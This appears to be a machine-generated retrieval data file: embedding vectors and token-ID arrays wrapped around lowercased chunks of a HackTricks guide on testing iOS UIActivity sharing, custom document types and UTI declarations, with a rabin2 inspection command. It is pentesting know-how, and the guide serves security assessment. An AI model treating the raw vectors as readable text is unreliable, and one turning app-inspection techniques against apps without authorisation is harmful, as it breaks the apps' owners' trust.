0.03125947713851929, 0.9659242033958435, -0.2603883147239685, 0.776509702205658, -0.09140729904174805, 0.22227798402309418, -0.6041123867034912, -0.6625571846961975, -0.046849027276039124, -0.11850006878376007, -0.11481212824583054, -0.08212456852197647, -0.7561019062995911, 0.5700017213821411, 0.16818583011627197, -0.15269380807876587, -0.1773083209991455, -0.603061854839325, 0.20836453139781952, -0.17600621283054352, 0.8970655202865601, -0.0528465136885643, -0.5237272381782532, 0.32836204767227173, -0.4753834307193756, -0.5092100501060486, -0.6611919403076172, -0.03693792596459389, -0.1503588706254959, -0.010619963519275188, 0.6144527792930603, -0.15410007536411285, -0.7649029493331909, 0.21981602907180786, -0.2863008677959442, -0.41503316164016724, -0.03256402909755707, 0.6825001835823059, -0.12692418694496155, 0.4408281147480011, -0.36981871724128723, 0.1557341367006302, 0.08311383426189423, 0.8354443311691284, 0.46209296584129333, 0.28831732273101807, -0.00318016461096704, 0.3199077844619751 ]
[ 5472, 8758, 2075, 2404, 1999, 2173, 2011, 1996, 9808, 1012, 3568, 1010, 2151, 10439, 2006, 1996, 5080, 2064, 3191, 2151, 5371, 2006, 1996, 6764, 27268, 6633, 1010, 2164, 2060, 18726, 6764, 1010, 16324, 1998, 3145, 24925, 2078, 1012, 1037, 7173, 29162, 5080, 4473, 5198, 2000, 16500, 14477, 9397, 26251, 18726, 1998, 21155, 2062, 17928, 2015, 1010, 2029, 4728, 4995, 1005, 1056, 7801, 1012, 2009, 1005, 1055, 2025, 6749, 2000, 7173, 23890, 1996, 4684, 2005, 3180, 5198, 10354, 3334, 7173, 23890, 2075, 10735, 3937, 5604, 3136, 3900, 4014, 23890, 10788, 3366, 26061, 2140, 5097, 2097, 3046, 2000, 11487, 2065, 1996, 4684, 2003, 7173, 29162, 1998, 1999, 2008, 2553, 1996, 4646, 2180, 1005, 1056, 2448, 10354, 3334, 7173, 23890, 2075, 2019, 16380, 6764, 1998, 19622, 2015, 2024, 2788, 5361, 1010, 2122, 2064, 2022, 9022, 2000, 5646, 2065, 1996, 5080, 2003, 7173, 29162, 1012, 1999, 1037, 7173, 29162, 5080, 5097, 2131, 3191, 1013, 4339, 3229, 2000, 2047, 6764, 2648, 1996, 5472, 8758, 14045, 17928, 4455, 2097, 16582, 11543, 10760, 3739, 1997, 1996, 7480, 4095, 2326, 9289, 2989, 1013, 8026, 1013, 14021, 2097, 2709, 1015, 2612, 1997, 1014, 5974, 2592, 2055, 2129, 2000, 11487, 7173, 23890, 2075, 2182, 1012, 2017, 2064, 3046, 2000, 4468, 2023, 10788, 2015, 2478, 22224, 1005, 1055, 16380, 7173, 23890, 4487, 19150, 3900, 4014, 23890, 10788, 11826, 29337, 2064, 3046, 2000, 4468, 2023, 10788, 2015, 2478, 22224, 1005, 1055, 16380, 7173, 23890, 4487, 19150, 29337, 2071, 2036, 16500, 1996, 6994, 7044, 5507, 2063, 1006, 16770, 1024, 1013, 1013, 29431, 3051, 5654, 2271, 1012, 4012, 1013, 16360, 2080, 1013, 1007, 1012, 2320, 1996, 16360, 2080, 2003, 2794, 1010, 1996, 10439, 2323, 3711, 1999, 1996, 1520, 3945, 1521, 21628, 102 ]
hack_tricks
431.txt
4
[CLS] ios uiactivity sharinguiactivity sharingstarting on ios 6 it is possible for third - party apps to share data ( items ) via specific mechanisms like airdrop, for example. from a user perspective, this feature is the well - known system - wide share activity sheet that appears after clicking on the " share " button. a full list of the available built - in sharing mechanisms can be found in uiactivity. activitytype. if not considered appropriate for the app, the developers have the possibility to exclude some of these sharing mechanisms. sending itemswhen testing uiactivity sharing you should pay special attention to : the data ( items ) being shared, the custom activities, the excluded activity types. data sharing via uiactivity works by creating a uiactivityviewcontroller and passing it the desired items ( urls, text, a picture ) on init ( activityitems : applicationactivities : ). if having the source code, you should take a look at the uiactivityviewcontroller : inspect the activities passed to the init ( activityitems : applicationactivities : ) method. check if it defines custom activities ( also being passed to the previous method ). verify the excludedactivitytypes, if any. if you only have the compiled / installed app, try searching for the previous method and property, for example : $ rabin2 - zq telegram \ x. app / telegram \ x | grep - i activityitems0x1000df034 45 44 initwithactivityitems : applicationactivities : receiving itemswhen receiving items, you should check : if the app declares _ custom document types _ * * * * by looking into exported / imported utis ( " info " tab of the xcode project ). the list of all system declared utis ( uniform type identifiers ) can be found in the archived apple developer documentation. if the app specifies any document types that it can open by looking into document types ( " info " tab of the xcode project ). if present, they consist of name and one or more utis that represent the data type ( e. g. " public. png " for png files ). ios uses this to determine if the app is eligible to open a given document ( specifying exported / imported utis is not enough ). if the app properly verifies the received data by looking into the implementation of application : openurl : options :
[ 0.04678446799516678, 0.14303766191005707, -0.12515781819820404, 1.1184093952178955, 0.05977839231491089, 0.09413531422615051, 0.6304745674133301, 0.34812742471694946, 0.47727715969085693, 0.6451950669288635, -0.7277340292930603, 0.39019760489463806, 0.3374616503715515, -0.33679336309432983, -0.4725307822227478, -0.6843301057815552, -0.7557395696640015, -0.14442569017410278, -0.7677547335624695, -0.28443101048469543, 0.18353161215782166, 0.6150123476982117, -0.708010733127594, -0.8120009303092957, -0.2426639199256897, 0.8138563632965088, 0.7852311134338379, 0.10927898436784744, 0.634149968624115, 0.9666318297386169, 0.146768718957901, -0.17345167696475983, -0.017572728917002678, -0.7155770659446716, 0.11053342372179031, 0.06230553612112999, 0.9847625494003296, -0.5279055237770081, -0.03526995703577995, -0.7267860174179077, 0.3337337374687195, -0.10629123449325562, 0.11285195499658585, -0.23564742505550385, -0.5726145505905151, -0.37824365496635437, 0.3186643421649933, 0.1930113136768341, 0.39926937222480774, -0.21050754189491272, 0.7811640501022339, 0.44595056772232056, 0.0022920584306120872, 0.28530794382095337, 0.2567763924598694, -0.1881917119026184, -0.26155081391334534, -0.23392410576343536, -0.31014785170555115, 0.4945107102394104, -0.12429043650627136, -0.09361564368009567, 0.16095995903015137, -1.0072818994522095, 0.6225467920303345, 0.5929189324378967, -0.538822591304779, -0.22192569077014923, -0.5084044337272644, -0.457673043012619, -0.2075490653514862, 0.9929838180541992, -0.530410647392273, -0.728217601776123, -0.45875439047813416, 0.032819706946611404, -0.12172438949346542, -0.03214298188686371, 0.054361216723918915, 0.2841211259365082, 0.4211944341659546, 0.42545783519744873, 0.22566279768943787, 0.08813714981079102, -0.7158534526824951, 0.19060949981212616, 0.5205559134483337, 0.206663578748703, -0.07658639550209045, -0.06929676979780197, -0.022860221564769745, 0.013616852462291718, -0.6321267485618591, 0.02612411417067051, 1.0093271732330322, 0.785406231880188, -0.24061423540115356, 0.2596952021121979, 0.31809481978416443, 0.03597036749124527, 1.1231697797775269, 0.5509862899780273, 0.09965137392282486, -0.014696076512336731, -0.5752542614936829, 0.7641821503639221, 0.7730877995491028, -0.2346288412809372, 0.05017545446753502, -0.7022166848182678, -0.07962199300527573, 0.14682970941066742, 0.557259202003479, -0.8696616291999817, 0.7922551035881042, 0.48570334911346436, 0.31595578789711, 0.08754129707813263, -0.7077905535697937, 0.4446345567703247, -0.4006443917751312, -0.652064859867096, 0.0032925999257713556, -0.2618729770183563, 0.30445706844329834, 0.14858783781528473, 0.9873536825180054, 0.6096827983856201, -0.6350811123847961, 0.1538955718278885, -0.27354753017425537, -0.5186997652053833, -0.7023929953575134, 0.7384419441223145, -0.4810713231563568, 0.09398240596055984, -0.029345611110329628, 0.5208337306976318, 0.46122294664382935, -0.6723179817199707, 0.041097138077020645, 0.35717475414276123, -0.018366707488894463, 0.6288620829582214, 0.619040310382843, 0.05515425652265549, -0.7326794862747192, -0.9014991521835327, -0.30771294236183167, -0.17186719179153442, 0.2485368698835373, 0.584328830242157, 0.4737646281719208, -0.4493936598300934, -0.2581600844860077, -0.2613165080547333, -1.0611509084701538, 0.4659762978553772, 0.14052392542362213, 0.20756594836711884, -0.08584679663181305, 0.598943293094635, -0.06736098229885101, 0.17684563994407654, -0.4212758243083954, 0.6524314284324646, -0.6300939321517944, -0.9551262855529785, 0.07447844743728638, 0.5378507971763611, -0.29968640208244324, 0.02867715433239937, -0.273557186126709, 0.48646479845046997, 0.47052448987960815, 0.8923904895782471, 0.3338582515716553, -0.025212116539478302, 0.21145658195018768, 0.7348314523696899, -0.470798134803772, 0.3336293399333954, 0.47474417090415955, 0.701438844203949, -0.3300287127494812, 0.08806634694337845, -0.4637255370616913, -0.8465674519538879, -0.3084205985069275, -0.2860446274280548, 0.03270244225859642, 0.6408078074455261, -0.6207376718521118, 0.8908981084823608, 0.6287970542907715, -0.26987478137016296, -0.27109870314598083, -0.20531080663204193, 0.2652010917663574, -0.9814262390136719, -0.9181654453277588, 0.5849179625511169, 0.30793559551239014, 0.7013372182846069, -0.633410632610321, -0.5287765860557556, 0.1832079142332077, 0.46364110708236694, -0.16627158224582672, 0.7849597334861755, 1.0973920822143555, -0.5243887901306152, -0.4908466637134552, -0.5606715083122253, -0.06366420537233353, 0.13042882084846497, 0.49836960434913635, 0.7596001029014587, -0.38005220890045166, -0.5976413488388062, -0.31395208835601807, 0.363174706697464, 0.6882395148277283, -0.2661585807800293, 0.059236083179712296, -0.25458401441574097, 0.2954045236110687, 0.7154026031494141, -0.18246737122535706, -0.07262759655714035, 0.07084584981203079, 1.1215581893920898, 0.09929084777832031, 0.7512914538383484, 0.9010858535766602, -0.18685084581375122, -0.3810434341430664, 0.1237931177020073, 0.982011616230011, 0.10825555771589279, 0.28775128722190857, 0.19778066873550415, -0.052820835262537, -0.02550826407968998, 0.8376132249832153, 0.21260002255439758, 0.7023627758026123, 0.261905312538147, 0.6836962699890137, 0.6765959858894348, -0.7416748404502869, 0.7383518815040588, 0.7739334106445312, -0.16330115497112274, -0.6571119427680969, -0.3698127269744873, 0.8078979849815369, 0.6372135877609253, -0.3174131214618683, -0.6175460815429688, -0.6611654758453369, 0.3646808862686157, 0.08428893983364105, 0.4175642132759094, 0.47229665517807007, 0.5787646770477295, -0.057056132704019547, 0.23745310306549072, -0.3919297158718109, -0.4849781095981598, -0.5896520018577576, -0.16262473165988922, -1.405411720275879, -0.5887251496315002, -0.5659749507904053, -0.4813360571861267, 0.545763373374939, -0.8218480348587036, 0.5171059966087341, -0.07647044211626053, -0.419710636138916, 0.20236170291900635, 0.337658554315567, 0.6307608485221863, -0.2607792615890503, -0.22644495964050293, -0.7602465152740479, 0.3587145507335663, -0.2357964664697647, 0.3869653344154358, -0.31629669666290283, 0.29628610610961914, 0.3157998323440552, 0.23589062690734863, 0.21347743272781372, -0.7065283060073853, 0.765849769115448, 0.3454844057559967, 0.1729840487241745, -0.07059306651353836, -0.3661596477031708, 0.11504320800304413, 0.05278652906417847, 0.1526356190443039, -0.5868731737136841, 0.8472080230712891, -0.27815186977386475, -0.026863573119044304, 0.6519222259521484, 0.5467684864997864, -0.3561096787452698, 0.15056970715522766, 0.5181495547294617, -0.06709620356559753, -0.5541215538978577, -0.019761549308896065, 0.2779284715652466, 0.04484296962618828, 0.2855294346809387, -0.06518186628818512, -0.1869063377380371, -0.5485158562660217, -0.17407238483428955, 0.2770693302154541, -0.7456338405609131, -0.3380143642425537, 0.0037757179234176874, -0.9707732200622559, 0.08141180872917175, -0.421385258436203, -0.24926996231079102, 0.11913647502660751, -0.2612256109714508, 0.8098595142364502, -0.0227753147482872, -0.039916910231113434, -0.3113406300544739, -0.8491179943084717, 0.7551143169403076, 0.3254149258136749, 0.20860758423805237, 0.011453499086201191, 0.6423068046569824, -0.6194301843643188, -0.4125053584575653, 0.3941163718700409, -0.06752846390008926, -0.16753791272640228, 0.6267876029014587, -0.4263911843299866, -0.2114368975162506, -0.6584095358848572, 0.0725894570350647, 0.07837413251399994, 0.0705854669213295, 0.6647648215293884, -0.26493892073631287, -0.057223331183195114, 0.22942644357681274, 0.11058492958545685, 0.44285649061203003, 0.037401292473077774, 0.4116833508014679, -0.158904030919075, -0.572357714176178, -0.27070435881614685, 0.36645039916038513, 0.3937877416610718, 0.5543361306190491, -0.10992106795310974, 0.7808399796485901, 0.04665933921933174, 0.19832167029380798, 0.43553170561790466, -0.5144595503807068, -0.842863142490387, 0.5977849364280701, 0.1317654401063919, 1.0003762245178223, -0.7725176215171814, -0.021496742963790894, 0.178313747048378, 0.5921738743782043, 0.09939303994178772, 0.6146236062049866, 0.11741635948419571, -0.6334152817726135, 0.26618149876594543, 0.4955200254917145, -0.33370763063430786, 0.0825040265917778, 0.07927899807691574, -0.2833651602268219, -0.22944490611553192, -0.5496389269828796, -0.2751648426055908, 0.77440345287323, 0.5854648947715759, 0.7449926137924194, 0.17912565171718597, 1.4133989810943604, 0.5266807675361633, -0.41619664430618286, -0.06269516795873642, -0.3289935290813446, 0.22499918937683105, -0.219089537858963, 0.6740134954452515, 0.05920417979359627, 0.05845855921506882, -0.4491833746433258, -0.2925858497619629, -0.8234915733337402, -0.4200618863105774, 0.5396590828895569, -0.088882677257061, -1.1369560956954956, -0.8164634704589844, -0.45517322421073914, -0.1780671924352646, -0.5910095572471619, -0.06630777567625046, -0.07024966925382614, 0.1554131805896759, 0.6245018243789673, -0.22708550095558167, 0.14892224967479706, -0.5572730302810669, 0.30724093317985535, 0.1323239654302597, -0.7329618334770203, 0.09101974964141846, -0.5801212787628174, -0.15870507061481476, -0.5404917597770691, 0.05067436024546623, 0.9060385823249817, -0.1414315551519394, 0.0016258802497759461, -0.5713499784469604, 0.1733725517988205, 0.8964023590087891, -0.40182289481163025, -0.25050753355026245, 0.18715018033981323, 0.22577154636383057, 0.308320015668869, 0.5969263911247253, -0.3170258104801178, 0.09242410212755203, 0.03815735504031181, -0.24840357899665833, 0.07501810044050217, -0.7664837837219238, -0.033892225474119186, 0.05020880699157715, -0.16331225633621216, -0.09641124308109283, 0.15501083433628082, -0.7567614912986755, -0.027095135301351547, -0.009899009950459003, 0.4303988814353943, 0.08027621358633041, -0.030303828418254852, 0.6484050154685974, -0.49260175228118896, -0.19529595971107483, 0.6248294115066528, 0.37611106038093567, -0.35401326417922974, -0.14914636313915253, -0.472019225358963, -0.03960215300321579, 0.7423909306526184, -0.6287815570831299, -0.06534429639577866, -0.18414971232414246, 0.16303017735481262, -0.31952741742134094, -0.2903243601322174, 0.8923299312591553, -0.12390393018722534, 0.3070581257343292, -0.6941450238227844, -0.26724475622177124, 0.35165077447891235, 0.20210325717926025, 0.2707330286502838, 0.8886195421218872, 0.24455004930496216, -0.5054685473442078, -0.1907016485929489, 0.2321002036333084, -0.6515021324157715, -0.2580803632736206, 0.29482874274253845, -0.6692589521408081, 0.4361022710800171, -0.341764360666275, 0.9803383946418762, -0.2645152509212494, -0.514335036277771, 0.5095648169517517, 0.19399148225784302, 0.5944218635559082, -0.8093488812446594, -0.3345511257648468, -0.21811623871326447, -0.45174890756607056, 0.46422553062438965, 0.2572750449180603, -0.5475530624389648, 0.24115251004695892, 0.4431774914264679, 0.11671849340200424, 0.3874415159225464, -0.27495190501213074, -0.5848042368888855, 0.31331712007522583, -0.006571730598807335, -0.4457591772079468, 0.18317602574825287, -0.16708840429782867, -0.007291924208402634, -0.6024757623672485, -0.18836535513401031, 0.02774694934487343, -0.8935332298278809, -0.9200946092605591, -0.13351376354694366, -0.6876947283744812, 0.3504916727542877, -0.5541066527366638, -0.19521087408065796, -0.008744509890675545, 0.6359942555427551, -0.2485131323337555, -0.7100862860679626, 0.27609118819236755, 0.044669512659311295, -0.028868094086647034, -0.5830397605895996, -0.772437572479248, -0.7618661522865295, 0.15495477616786957, -0.13975997269153595, 0.4864960312843323, -0.06459765136241913, -0.16306252777576447, 0.29973599314689636, -0.29613107442855835, 0.1363849937915802, 0.1492602527141571, 0.05638222023844719, -0.1904582381248474, 0.12433107942342758, 0.4282839000225067, -0.901095449924469, 0.5717280507087708, -0.9304113984107971, 0.872876763343811, -0.26643550395965576, -0.294408917427063, 0.037698373198509216, -0.17540208995342255, -0.44022852182388306, 0.6023913621902466, 0.7183147072792053, -0.7618070244789124, -0.18765641748905182, -0.8590316772460938, 0.9418462514877319, 0.14983169734477997, -0.09512172639369965, -1.1520856618881226, 0.6419606804847717, -0.26654908061027527, -1.0628578662872314, 0.2316625565290451, -0.025146082043647766, -0.026429181918501854, 0.022524813190102577, 0.6213118433952332, 0.3722626566886902, -0.4600713849067688, 0.35148313641548157, 0.8619609475135803, -0.5021750926971436, 0.6635225415229797, -0.28499194979667664, 0.26624706387519836, 0.332802414894104, -0.27460476756095886, 0.34509965777397156, -0.22348682582378387, -0.11978418380022049, -0.4760323166847229, -0.4974304735660553, -0.43134966492652893, -0.5194877982139587, -0.20864717662334442, 0.13785259425640106, -0.10959476977586746, 0.5339371562004089, -0.14473363757133484, -0.9265074133872986, 0.01235488522797823, 0.004623952321708202, -0.20062090456485748, 0.2563718855381012, 0.5689834356307983, -0.08105757087469101, -0.04221302270889282, -0.13478395342826843, 0.5260957479476929, -0.19573362171649933, 0.20319117605686188, 0.8441081047058105, 0.03384574502706528, -0.876004695892334, 0.28300929069519043, 0.5527612566947937, -0.8978918194770813, 0.29297706484794617, -0.21964246034622192, -0.29476335644721985, 0.7728641033172607, 0.1745661199092865, 0.1366550475358963, 0.43306151032447815, -0.14000676572322845, 0.3908437490463257, 0.16199985146522522, 0.09988138824701309, -0.07286371290683746, -0.427204430103302, 0.2582567632198334, 0.3347211480140686, -0.024131756275892258, 0.40827515721321106, -0.9301050305366516, -0.27875804901123047, -0.5187191963195801, 0.029405100271105766, 0.2674614191055298, -0.25544485449790955, 1.347377061843872, -0.11419551819562912, 0.08718561381101608, 0.02318420819938183, -0.2555572986602783, 0.22845278680324554, -0.18415088951587677, -0.08643145114183426, 0.8340100646018982, 0.22791048884391785, -0.397676020860672, -0.8317195773124695, 0.5282207131385803, -0.12195893377065659, 0.01713208295404911, -0.4183140993118286, 0.0014144442975521088, 0.2429042011499405, -0.1238623782992363, 0.24256257712841034, -0.6830984950065613, -0.5386962890625, -0.9214230179786682, -0.2985089123249054, 0.024523360654711723, -0.017436828464269638, -0.22551380097866058, 0.5519249439239502, 0.4113054871559143, -0.738718569278717, -0.6945095658302307, 0.30939188599586487, -0.04442295804619789, 0.10993324220180511, -0.6730834245681763, -0.3980925977230072, -0.7061470150947571, -0.45362940430641174, -0.28102532029151917, -0.36010265350341797, 0.1720525473356247, -0.27076488733291626, -0.7205926775932312, -0.6698110699653625, -0.39824554324150085, 0.1538408100605011, 0.3573632836341858, -0.06134713813662529, -0.6195589900016785, -0.05973687022924423, -0.5152672529220581, 0.9130380153656006, -0.1624271273612976, -0.3701954185962677, 0.19003073871135712, 0.10518927127122879, 0.5191783905029297, -0.4994623064994812, -0.4125370979309082, -0.5529022216796875, 0.18642543256282806, -0.1515171080827713, 0.09852013736963272, -0.6982218623161316, -0.331062912940979, 0.1263512820005417, -0.8619177937507629, -0.10890494287014008, -0.07925904542207718, -0.4634021818637848, 0.3664266765117645, -0.43381524085998535, -0.0007002074853517115, 0.0453190952539444, 0.40407735109329224, 0.7580097913742065, -0.7674793601036072, -0.179192915558815, 0.4027569591999054, 0.43752747774124146, 0.4254824221134186, -0.1232265755534172, 0.1980293095111847, -0.3592630922794342, -0.26163214445114136, 0.1033322736620903, -0.33377665281295776, 0.6585037112236023, 0.2646704912185669, -0.3086802363395691, -0.3504897356033325, 0.05666453763842583, 0.03575854375958443, 0.09758786857128143, 0.09868629276752472, -0.2866605818271637, 0.19329391419887543, -0.03731994703412056, -0.1340453028678894, -0.08054301887750626, -1.0568081140518188, -0.2995471954345703, 0.5010855793952942, -0.22019840776920319, -0.7041165232658386, 0.0493258498609066, 0.40633001923561096, -0.2463773638010025, -0.09309756010770798, -0.4118480384349823, 0.08229249715805054, -0.20232872664928436, -0.8662726283073425, 0.8910588622093201, -0.30291205644607544, -0.5596885085105896, -0.37965574860572815, 0.5330662727355957, -0.8076650500297546, -0.4699093699455261, 0.4328342080116272, 0.9657313823699951, 0.24462004005908966, 0.1272115558385849, -0.2691118121147156, -0.3671226501464844, 0.42379215359687805, 0.04009702429175377, 0.00994565337896347, 0.3292951285839081, -0.38479799032211304, -0.09068867564201355, -0.1024370789527893, 0.3659225106239319, -0.02526579052209854, 0.2861015200614929, -0.18788662552833557, -0.7067370414733887, -0.15687265992164612, 0.09677480906248093, -0.10374018549919128, -0.1450406312942505, 0.6425313949584961, 0.25859326124191284, 0.9795942306518555, 0.23601870238780975, 0.05500846356153488, -0.11807609349489212, 0.5023995637893677, 0.10572914779186249, 0.2872639298439026, -0.08377569913864136, -0.14898158609867096, 0.3199000656604767, -0.12622776627540588, -0.5878629088401794, 0.34884321689605713, -0.06394465267658234, -0.1733875721693039, 0.4846620261669159, -0.5119251608848572, 0.33489498496055603, 0.0021939135622233152, -0.46001604199409485, 0.2456171214580536, 0.07666899263858795, -0.18796248733997345, -0.11936669051647186, -0.27757805585861206, 0.41960960626602173, -0.40658995509147644, 0.8220993280410767, 0.1489999145269394, 0.6792526841163635, 0.1325124055147171, -0.5553157329559326, -0.9102344512939453, 0.752938985824585, 1.089968204498291, -0.2801378071308136, 0.807722270488739, 0.47904688119888306, -0.39894911646842957, 0.18142327666282654, 0.6204509139060974, 0.1811860203742981, -0.7553762793540955, 0.7432706356048584, 0.1429913341999054, -0.5423191785812378, -0.5217552185058594, 0.048613641411066055, 0.4110313653945923, 0.13476651906967163, 0.6901280283927917, -0.3731260597705841, 0.09949150681495667, -0.6513436436653137, -0.4882046580314636, -0.7363227605819702, -0.0967150405049324, 0.5783993601799011, -0.6281628608703613, -0.16105887293815613, 0.37779539823532104, -0.5243071913719177, 0.37430405616760254, 0.43426600098609924, 0.24165189266204834, -0.4628467857837677, 0.3744182288646698, 0.5718980431556702, -0.6504119634628296, -0.3756105899810791, -0.206183061003685, -0.011566083878278732, -0.2447335571050644, -0.2306433618068695, -0.14503759145736694, 0.3814607560634613, -0.051129333674907684, -0.48366186022758484, -0.5180540680885315, -0.04138624668121338, 0.05291794240474701, -1.0208566188812256, 0.21381355822086334, 0.4165557622909546, -0.7049050331115723, -0.14141704142093658, 0.12785375118255615, -0.5329490900039673, 0.5004058480262756, -0.5175795555114746, -0.47471022605895996, -0.44617098569869995, 0.0009315672796219587, -0.16920268535614014, 1.4723422527313232, -0.0668003186583519, -0.5659915804862976, 0.4006023406982422, -0.7172623872756958, -0.6366680860519409, -0.21581842005252838, -0.5484516024589539, -0.9578245878219604, 0.6803029179573059, -0.33718302845954895, 0.645635187625885, 0.6594600081443787, -0.25708335638046265, -0.6038600206375122, 0.42547208070755005, 1.0313472747802734, -0.5736196637153625, 1.055909276008606, 0.3130449950695038, 0.09869661927223206, 0.05162888020277023, -0.355184942483902, 0.4214319884777069, 0.044981248676776886, -0.12643346190452576, -0.18572279810905457, -0.2394741326570511, -0.44892191886901855, -0.4531218707561493, -0.04471590369939804, 0.252928763628006, -0.19231432676315308, 0.012423229403793812, -0.7106470465660095, -0.292308509349823, -1.2954126596450806, 0.39583563804626465, -0.527517557144165, 0.22170984745025635, 0.2996852397918701, -0.10870395600795746, 1.004638910293579, -0.5858924388885498, 4.45869255065918, 0.30193305015563965, 0.14524959027767181, 0.1970834583044052, -0.3092344403266907, 0.7421206831932068, 1.3137524127960205, -0.5601177215576172, 0.00007601665129186586, -0.15032686293125153, 0.13017351925373077, 0.3418586552143097, 0.5476352572441101, -0.08638045936822891, 0.5274097919464111, 0.19214358925819397, -0.9460419416427612, 0.13114960491657257, 0.3021407425403595, -0.7946524620056152, -0.7878480553627014, 0.7469385862350464, -0.2030433565378189, 0.5154850482940674, -0.03653386980295181, -0.21349208056926727, 0.29452523589134216, -0.5103858113288879, -0.19820690155029297, 0.1533651500940323, -0.0730515867471695, -0.3101544678211212, 0.04806947708129883, -0.9108911752700806, -0.2177681177854538, 0.8590633869171143, -0.17671199142932892, -1.0318918228149414, -0.1704476922750473, -0.13705751299858093, -0.12148772925138474, 0.035438138991594315, -0.2836441099643707, -0.02134080044925213, 0.48188531398773193, 0.2141159176826477, 0.024350719526410103, 0.09954700618982315, 0.23081520199775696, -0.8503978848457336, 0.6312444806098938, -0.4038403332233429, 0.5362247824668884, -0.18063142895698547, -1.019179105758667, -0.04391739144921303, -0.06521648168563843, -0.44776085019111633, 0.4396101236343384, -0.05230187252163887, 0.5491201877593994, -0.5968326926231384, 0.24537087976932526, 0.06553797423839569, -0.8966391086578369, 0.27318355441093445, -0.7956699728965759, 1.5877269506454468, -0.1542806476354599, 0.18397623300552368, -0.5882833003997803, -0.2721712291240692, -0.5938834547996521, -0.20257660746574402, 0.6656195521354675, -0.35479092597961426, -0.20811614394187927, 0.6124010682106018, -0.08226825296878815, -0.9717156887054443, 0.02247709408402443, -0.35970643162727356, -0.3613145649433136, 0.6861718893051147, 1.2932696342468262, 0.6679698824882507, -0.17595456540584564, -0.3979024291038513, -0.011162769980728626, -0.050459690392017365, 0.45184457302093506, -0.10644853115081787, -0.06475922465324402, -0.15339574217796326, -0.48743975162506104 ]
[ 101, 16380, 21318, 18908, 7730, 6631, 10179, 18908, 7730, 6631, 14117, 3436, 2006, 16380, 1020, 2009, 2003, 2825, 2005, 2353, 1011, 2283, 18726, 2000, 3745, 2951, 1006, 5167, 1007, 3081, 3563, 10595, 2066, 2250, 25711, 1010, 2005, 2742, 1012, 2013, 1037, 5310, 7339, 1010, 2023, 3444, 2003, 1996, 2092, 1011, 2124, 2291, 1011, 2898, 3745, 4023, 7123, 2008, 3544, 2044, 22042, 2006, 1996, 1000, 3745, 1000, 6462, 1012, 1037, 2440, 2862, 1997, 1996, 2800, 2328, 1011, 1999, 6631, 10595, 2064, 2022, 2179, 1999, 21318, 18908, 7730, 1012, 4023, 13874, 1012, 2065, 2025, 2641, 6413, 2005, 1996, 10439, 1010, 1996, 9797, 2031, 1996, 6061, 2000, 23329, 2070, 1997, 2122, 6631, 10595, 1012, 6016, 5167, 2860, 10222, 5604, 21318, 18908, 7730, 6631, 2017, 2323, 3477, 2569, 3086, 2000, 1024, 1996, 2951, 1006, 5167, 1007, 2108, 4207, 1010, 1996, 7661, 3450, 1010, 1996, 12421, 4023, 4127, 1012, 2951, 6631, 3081, 21318, 18908, 7730, 2573, 2011, 4526, 1037, 21318, 18908, 7730, 8584, 8663, 13181, 10820, 1998, 4458, 2009, 1996, 9059, 5167, 1006, 24471, 4877, 1010, 3793, 1010, 1037, 3861, 1007, 2006, 1999, 4183, 1006, 4023, 4221, 5244, 1024, 4646, 18908, 12848, 6447, 1024, 1007, 1012, 2065, 2383, 1996, 3120, 3642, 1010, 2017, 2323, 2202, 1037, 2298, 2012, 1996, 21318, 18908, 7730, 8584, 8663, 13181, 10820, 1024, 22459, 1996, 3450, 2979, 2000, 1996, 1999, 4183, 1006, 4023, 4221, 5244, 1024, 4646, 18908, 12848, 6447, 1024, 1007, 4118, 1012, 4638, 2065, 2009, 11859, 7661, 3450, 1006, 2036, 2108, 2979, 2000, 1996, 3025, 4118, 1007, 1012, 20410, 1996, 12421, 18908, 7730, 13874, 2015, 1010, 2065, 2151, 1012, 2065, 2017, 2069, 2031, 1996, 9227, 1013, 5361, 10439, 1010, 3046, 6575, 2005, 1996, 3025, 4118, 1998, 3200, 1010, 2005, 2742, 1024, 1002, 10958, 8428, 2475, 1011, 1062, 4160, 23921, 1032, 1060, 1012, 10439, 1013, 23921, 1032, 1060, 1064, 24665, 13699, 1011, 1045, 4023, 4221, 5244, 2692, 2595, 18613, 2692, 20952, 2692, 22022, 3429, 4008, 1999, 4183, 24415, 18908, 7730, 4221, 5244, 1024, 4646, 18908, 12848, 6447, 1024, 4909, 5167, 2860, 10222, 4909, 5167, 1010, 2017, 2323, 4638, 1024, 2065, 1996, 10439, 18806, 1035, 7661, 6254, 4127, 1035, 1008, 1008, 1008, 1008, 2011, 2559, 2046, 15612, 1013, 10964, 21183, 2483, 1006, 1000, 18558, 1000, 21628, 1997, 1996, 1060, 16044, 2622, 1007, 1012, 1996, 2862, 1997, 2035, 2291, 4161, 21183, 2483, 1006, 6375, 2828, 8909, 4765, 28295, 1007, 2064, 2022, 2179, 1999, 1996, 9749, 6207, 9722, 12653, 1012, 2065, 1996, 10439, 27171, 2151, 6254, 4127, 2008, 2009, 2064, 2330, 2011, 2559, 2046, 6254, 4127, 1006, 1000, 18558, 1000, 21628, 1997, 1996, 1060, 16044, 2622, 1007, 1012, 2065, 2556, 1010, 2027, 8676, 1997, 2171, 1998, 2028, 2030, 2062, 21183, 2483, 2008, 5050, 1996, 2951, 2828, 1006, 1041, 1012, 1043, 1012, 1000, 2270, 1012, 1052, 3070, 1000, 2005, 1052, 3070, 6764, 1007, 1012, 16380, 3594, 2023, 2000, 5646, 2065, 1996, 10439, 2003, 7792, 2000, 2330, 1037, 2445, 6254, 1006, 20648, 2075, 15612, 1013, 10964, 21183, 2483, 2003, 2025, 2438, 1007, 1012, 2065, 1996, 10439, 7919, 2310, 3089, 14213, 1996, 2363, 2951, 2011, 2559, 2046, 1996, 7375, 1997, 4646, 1024, 2330, 3126, 2140, 1024, 7047, 1024 ]
hack_tricks
432.txt
0
( or its deprecated version uiapplicationdelegate application : openurl : sourceapplication : annotation : ) in the app delegate. if not having the source code you can still take a look into the info. plist file and search for : utexportedtypedeclarations / utimportedtypedeclarations if the app declares exported / imported custom document types. cfbundledocumenttypes to see if the app specifies any document types that it can open. a very complete explanation about the use of these keys can be found on stackoverflow but here you have a summary : utexportedtypedeclarations : use them to define your own utis that your app wants to teach the system it is installed on. an uti describes a piece of data ( not necessarily data located inside a file! ) and requires at least an identifier ( com. example. mycooldatatype ). additionally it may have a name ( my cool data type ), one or more file name extensions (. mycooldatatype ), one or more mime types ( x - application / my - cool - data - type ), one or more pasteboard types ( used when transferring data of that kind using copy & paste ), and one or more legacy os type. usually you also want utis to conform to existing utis ( e. g. when you say your uti conforms to public. data, any process that can deal with generic data can also deal with your uti ). e. g. : you define your own proprietary file data format and you want this data format to be also known to other apps, 